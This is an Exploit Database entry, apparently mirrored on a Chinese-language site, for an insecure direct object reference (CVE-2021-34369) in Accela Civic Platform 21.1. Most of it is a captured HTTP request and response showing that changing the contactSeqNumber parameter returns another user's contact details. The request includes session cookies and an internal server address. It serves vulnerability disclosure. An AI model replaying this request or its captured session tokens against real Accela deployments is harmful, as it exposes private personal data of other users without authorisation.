Accela Civic Platform 21.1 – ‘contactSeqNumber’ Insecure Direct Object References (IDOR)

• Exploit Database
• 16 阅读

• 作者： Abdulazeez Alaseeri
  日期： 2021-06-14
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49991/

• # Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)
  # Software Link: https://www.accela.com/civic-platform/
  # Version: <= 21.1
  # Author: Abdulazeez Alaseeri
  # Tested on: JBoss server/windows
  # Type: Web App
  # Date: 07/06/2021
  # CVE: CVE-2021-34369
  
  
  ================================================================
  Accela Civic Platform Insecure Direct Object References <= 21.1
  ================================================================
  
  This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber
  ================================================================
  Request Heeaders start
  ================================================================
  
  GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1
  
  Host: Hidden
  
  Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802
  
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  
  Accept-Language: en-US,en;q=0.5
  
  Accept-Encoding: gzip, deflate
  
  Upgrade-Insecure-Requests: 1
  
  Te: trailers
  
  Connection: close
  
  ================================================================
  Request Heeaders end
  ================================================================
  
  
  
  ================================================================
  Response Heeaders start
  ================================================================
  HTTP/1.1 200 OK
  
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  
  Cache-Control: no-cache
  
  X-Powered-By: JSP/2.3
  
  Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure
  
  Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure
  
  Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure
  
  Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure
  
  X-XSS-Protection: 0
  
  Pragma: No-cache
  
  X-UA-Compatible: IE=EDGE
  
  Date: Wed, 09 Jun 2021 04:09:40 GMT
  
  Connection: close
  
  Content-Type: text/html;charset=UTF-8
  
  Content-Length: 98126
  ================================================================
  Response Heeaders end
  ================================================================
  
  contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR